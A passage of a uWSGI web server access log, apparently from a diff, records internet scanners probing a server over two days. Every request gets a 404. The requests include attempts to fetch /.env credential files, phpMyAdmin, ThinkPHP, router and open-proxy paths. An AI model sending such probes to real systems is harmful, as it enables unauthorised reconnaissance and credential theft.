832/962] 101.133.140.114 () {36 vars in 551 bytes} [Thu Feb 10 06:17:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 833/963] 47.103.33.128 () {36 vars in 549 bytes} [Thu Feb 10 06:20:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 834/964] 192.241.212.223 () {34 vars in 407 bytes} [Thu Feb 10 06:44:28 2022] GET /hudson => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 835/965] 47.103.98.159 () {32 vars in 502 bytes} [Thu Feb 10 07:01:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 836/966] 106.14.83.56 () {32 vars in 500 bytes} [Thu Feb 10 07:33:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 837/967] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 10 07:57:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 838/968] 128.14.141.34 () {34 vars in 487 bytes} [Thu Feb 10 08:36:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 839/969] 167.249.102.51 () {32 vars in 464 bytes} [Thu Feb 10 09:08:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 840/970] 221.226.14.142 () {32 vars in 358 bytes} [Thu Feb 10 10:38:51 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 162.142.125.212 client_port: 24758] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 841/971] 162.142.125.212 () {24 vars in 267 bytes} [Thu Feb 10 10:49:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 842/972] 162.142.125.212 () {30 vars in 401 bytes} [Thu Feb 10 10:49:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 843/973] 162.142.125.212 () {22 vars in 236 bytes} [Thu Feb 10 10:49:07 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 167.248.133.119 client_port: 34027] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 844/974] 167.248.133.119 () {24 vars in 267 bytes} [Thu Feb 10 11:02:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 845/975] 167.248.133.119 () {30 vars in 402 bytes} [Thu Feb 10 11:02:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 846/976] 167.248.133.119 () {22 vars in 236 bytes} [Thu Feb 10 11:02:02 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 847/977] 165.227.125.62 () {22 vars in 236 bytes} [Thu Feb 10 12:28:10 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 848/978] 165.227.125.62 () {36 vars in 554 bytes} [Thu Feb 10 12:28:12 2022] GET /system_api.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 849/979] 165.227.125.62 () {36 vars in 550 bytes} [Thu Feb 10 12:28:16 2022] GET /c/version.js => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 850/980] 165.227.125.62 () {32 vars in 508 bytes} [Thu Feb 10 12:28:17 2022] GET /c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 8/981] 165.227.125.62 () {36 vars in 578 bytes} [Thu Feb 10 12:28:19 2022] GET /streaming/clients_live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 29/982] 165.227.125.62 () {32 vars in 536 bytes} [Thu Feb 10 12:28:20 2022] GET /streaming/clients_live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 9/983] 165.227.125.62 () {36 vars in 580 bytes} [Thu Feb 10 12:28:21 2022] GET /stalker_portal/c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 72/984] 165.227.125.62 () {32 vars in 538 bytes} [Thu Feb 10 12:28:21 2022] GET /stalker_portal/c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 8/985] 165.227.125.62 () {36 vars in 463 bytes} [Thu Feb 10 12:28:22 2022] GET /stream/live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 30/986] 165.227.125.62 () {32 vars in 421 bytes} [Thu Feb 10 12:28:22 2022] GET /stream/live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 9/987] 165.227.125.62 () {36 vars in 550 bytes} [Thu Feb 10 12:28:24 2022] GET /flu/403.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 73/988] 165.227.125.62 () {32 vars in 508 bytes} [Thu Feb 10 12:28:24 2022] GET /flu/403.html => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 31/989] 165.227.125.62 () {36 vars in 526 bytes} [Thu Feb 10 12:28:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 9/990] 45.83.66.49 () {42 vars in 574 bytes} [Thu Feb 10 12:29:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 32/991] 45.83.64.235 () {42 vars in 597 bytes} [Thu Feb 10 12:29:49 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 851/992] 34.140.248.32 () {42 vars in 563 bytes} [Thu Feb 10 12:33:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 852/993] 172.93.189.34 () {36 vars in 589 bytes} [Thu Feb 10 13:35:45 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 33/994] 172.93.189.34 () {40 vars in 696 bytes} [Thu Feb 10 13:35:45 2022] POST / => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 853/995] 101.132.119.255 () {34 vars in 433 bytes} [Thu Feb 10 13:36:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 854/996] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 10 13:39:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 855/997] 192.241.205.238 () {34 vars in 395 bytes} [Thu Feb 10 15:21:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 856/998] 2.57.121.247 () {34 vars in 401 bytes} [Thu Feb 10 16:04:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 857/999] 162.221.192.26 () {34 vars in 488 bytes} [Thu Feb 10 16:04:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 858/1000] 20.111.31.87 () {36 vars in 522 bytes} [Thu Feb 10 16:44:03 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 859/1001] 20.111.31.87 () {40 vars in 629 bytes} [Thu Feb 10 16:44:04 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 860/1002] 121.89.194.108 () {22 vars in 235 bytes} [Thu Feb 10 18:02:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 861/1003] 121.89.194.108 () {22 vars in 297 bytes} [Thu Feb 10 18:02:07 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 862/1004] 121.89.194.108 () {22 vars in 239 bytes} [Thu Feb 10 18:02:12 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 863/1005] 121.89.194.108 () {22 vars in 239 bytes} [Thu Feb 10 18:02:13 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 864/1006] 121.89.194.108 () {40 vars in 485 bytes} [Thu Feb 10 18:02:15 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 865/1007] 209.17.97.122 () {30 vars in 410 bytes} [Thu Feb 10 18:10:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 866/1008] 65.141.6.170 () {36 vars in 522 bytes} [Thu Feb 10 18:13:51 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 867/1009] 65.141.6.170 () {40 vars in 629 bytes} [Thu Feb 10 18:13:52 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 868/1010] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 10 18:23:46 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 869/1011] 185.173.35.25 () {30 vars in 451 bytes} [Thu Feb 10 18:33:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 870/1012] 83.97.20.34 () {26 vars in 286 bytes} [Thu Feb 10 19:20:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 871/1013] 47.95.213.129 () {34 vars in 500 bytes} [Thu Feb 10 20:05:08 2022] GET /TP/public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 872/1014] 47.95.213.129 () {34 vars in 486 bytes} [Thu Feb 10 20:05:08 2022] GET /TP/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 873/1015] 47.95.213.129 () {34 vars in 522 bytes} [Thu Feb 10 20:05:08 2022] GET /thinkphp/html/public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 3/1016] 47.95.213.129 () {34 vars in 504 bytes} [Thu Feb 10 20:05:08 2022] GET /html/public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 10/1017] 47.95.213.129 () {34 vars in 494 bytes} [Thu Feb 10 20:05:08 2022] GET /public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 10/1018] 47.95.213.129 () {34 vars in 510 bytes} [Thu Feb 10 20:05:08 2022] GET /TP/html/public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 11/1019] 47.95.213.129 () {34 vars in 482 bytes} [Thu Feb 10 20:05:09 2022] GET /elrekt.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 874/1020] 47.95.213.129 () {34 vars in 480 bytes} [Thu Feb 10 20:05:09 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 875/1021] 47.95.213.129 () {34 vars in 465 bytes} [Thu Feb 10 20:05:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 876/1022] 121.141.54.237 () {32 vars in 487 bytes} [Thu Feb 10 20:12:06 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 877/1023] 183.106.230.13 () {38 vars in 530 bytes} [Thu Feb 10 20:38:19 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 878/1024] 175.206.193.241 () {38 vars in 531 bytes} [Thu Feb 10 20:51:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 879/1025] 103.171.36.29 () {32 vars in 463 bytes} [Thu Feb 10 21:52:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 880/1026] 109.237.103.9 () {36 vars in 523 bytes} [Thu Feb 10 22:26:21 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 881/1027] 64.225.76.117 () {36 vars in 481 bytes} [Thu Feb 10 22:51:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 882/1028] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 10 23:23:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 883/1029] 167.94.138.45 () {28 vars in 310 bytes} [Thu Feb 10 23:43:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 884/1030] 167.94.138.45 () {34 vars in 442 bytes} [Thu Feb 10 23:43:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 885/1031] 109.237.103.123 () {36 vars in 525 bytes} [Thu Feb 10 23:43:31 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 886/1032] 128.1.248.42 () {34 vars in 486 bytes} [Fri Feb 11 00:17:33 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 887/1033] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 11 01:14:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 888/1034] 183.136.225.56 () {34 vars in 456 bytes} [Fri Feb 11 01:41:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 889/1035] 222.186.46.200 () {30 vars in 504 bytes} [Fri Feb 11 03:05:07 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 74/1036] 222.186.46.200 () {26 vars in 337 bytes} [Fri Feb 11 03:05:07 2022] CONNECT ip.ws.126.net:443 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 75/1037] 222.186.46.200 () {30 vars in 501 bytes} [Fri Feb 11 03:05:07 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 890/1038] 103.203.56.1 () {32 vars in 398 bytes} [Fri Feb 11 03:34:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 891/1039] 18.234.178.79 () {36 vars in 520 bytes} [Fri Feb 11 03:52:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 892/1040] 201.48.66.50 () {32 vars in 463 bytes} [Fri Feb 11 04:34:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 893/1041] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 11 05:08:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 894/1042] 183.136.225.14 () {34 vars in 459 bytes} [Fri Feb 11 05:59:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 895/1043] 183.136.225.14 () {36 vars in 542 bytes} [Fri Feb 11 06:00:47 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 896/1044] 183.136.225.14 () {36 vars in 540 bytes} [Fri Feb 11 06:00:47 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 897/1045] 20.151.201.9 () {32 vars in 447 bytes} [Fri Feb 11 06:12:53 2022] GET /cgi-bin/luci => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 898/1046] 101.133.224.74 () {32 vars in 503 bytes} [Fri Feb 11 06:51:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 899/1047] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 11 07:30:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 900/1048] 185.180.143.79 () {30 vars in 447 bytes} [Fri Feb 11 08:09:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 901/1049] 185.180.143.79 () {30 vars in 471 bytes} [Fri Feb 11 08:09:11 2022] GET /showLogin.cc => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 902/1050] 128.14.134.170 () {34 vars in 488 bytes} [Fri Feb 11 08:21:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 903/1051] 222.186.19.235 () {30 vars in 550 bytes} [Fri Feb 11 08:39:09 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 3/1052] 222.186.19.235 () {30 vars in 500 bytes} [Fri Feb 11 08:39:09 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 904/1053] 123.56.127.97 () {22 vars in 234 bytes} [Fri Feb 11 09:38:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 905/1054] 123.56.127.97 () {22 vars in 296 bytes} [Fri Feb 11 09:38:31 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 906/1055] 123.56.127.97 () {22 vars in 237 bytes} [Fri Feb 11 09:38:32 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 76/1056] 123.56.127.97 () {22 vars in 238 bytes} [Fri Feb 11 09:38:32 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 34/1057] 123.56.127.97 () {40 vars in 484 bytes} [Fri Feb 11 09:38:32 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 3/1058] 123.56.127.97 () {34 vars in 465 bytes} [Fri Feb 11 09:38:35 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 11/1059] 123.56.127.97 () {32 vars in 477 bytes} [Fri Feb 11 09:38:35 2022] GET /nmaplowercheck1644572315 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 35/1060] 123.56.127.97 () {32 vars in 439 bytes} [Fri Feb 11 09:38:36 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 77/1061] 123.56.127.97 () {32 vars in 449 bytes} [Fri Feb 11 09:38:36 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 78/1062] 123.56.127.97 () {28 vars in 307 bytes} [Fri Feb 11 09:38:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 79/1063] 123.56.127.97 () {32 vars in 466 bytes} [Fri Feb 11 09:38:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 907/1064] 123.56.127.97 () {28 vars in 420 bytes} [Fri Feb 11 09:38:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 908/1065] 5.8.10.202 () {30 vars in 333 bytes} [Fri Feb 11 10:48:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 36/1066] 5.8.10.202 () {34 vars in 500 bytes} [Fri Feb 11 10:48:30 2022] GET /aaa9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 80/1067] 5.8.10.202 () {34 vars in 500 bytes} [Fri Feb 11 10:48:45 2022] GET /aaa9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 909/1068] 5.8.10.202 () {34 vars in 500 bytes} [Fri Feb 11 10:48:46 2022] GET /aab9 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 910/1069] 113.31.103.17 () {30 vars in 328 bytes} [Fri Feb 11 11:04:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 911/1070] 83.97.20.34 () {30 vars in 328 bytes} [Fri Feb 11 11:12:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 912/1071] 20.151.201.9 () {36 vars in 499 bytes} [Fri Feb 11 11:57:36 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 913/1072] 103.203.58.4 () {30 vars in 346 bytes} [Fri Feb 11 12:10:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 914/1073] 202.141.244.42 () {32 vars in 465 bytes} [Fri Feb 11 12:16:47 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 915/1074] 34.140.248.32 () {42 vars in 562 bytes} [Fri Feb 11 12:39:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 916/1075] 185.180.143.72 () {34 vars in 488 bytes} [Fri Feb 11 13:40:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 917/1076] 64.62.197.122 () {28 vars in 307 bytes} [Fri Feb 11 13:52:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 918/1077] 106.15.191.82 () {34 vars in 459 bytes} [Fri Feb 11 14:22:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 919/1078] 37.201.144.31 () {32 vars in 487 bytes} [Fri Feb 11 14:28:39 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 920/1079] 192.241.211.225 () {34 vars in 395 bytes} [Fri Feb 11 15:15:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 921/1080] 128.14.141.34 () {34 vars in 487 bytes} [Fri Feb 11 16:50:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 922/1081] 39.99.229.34 () {32 vars in 408 bytes} [Fri Feb 11 17:03:55 2022] GET /text4041644599035 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 923/1082] 39.99.229.34 () {34 vars in 410 bytes} [Fri Feb 11 17:03:55 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 924/1083] 39.99.229.34 () {32 vars in 394 bytes} [Fri Feb 11 17:03:55 2022] GET /evox/about => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 925/1084] 39.99.229.34 () {32 vars in 384 bytes} [Fri Feb 11 17:03:55 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 926/1085] 39.99.229.34 () {28 vars in 306 bytes} [Fri 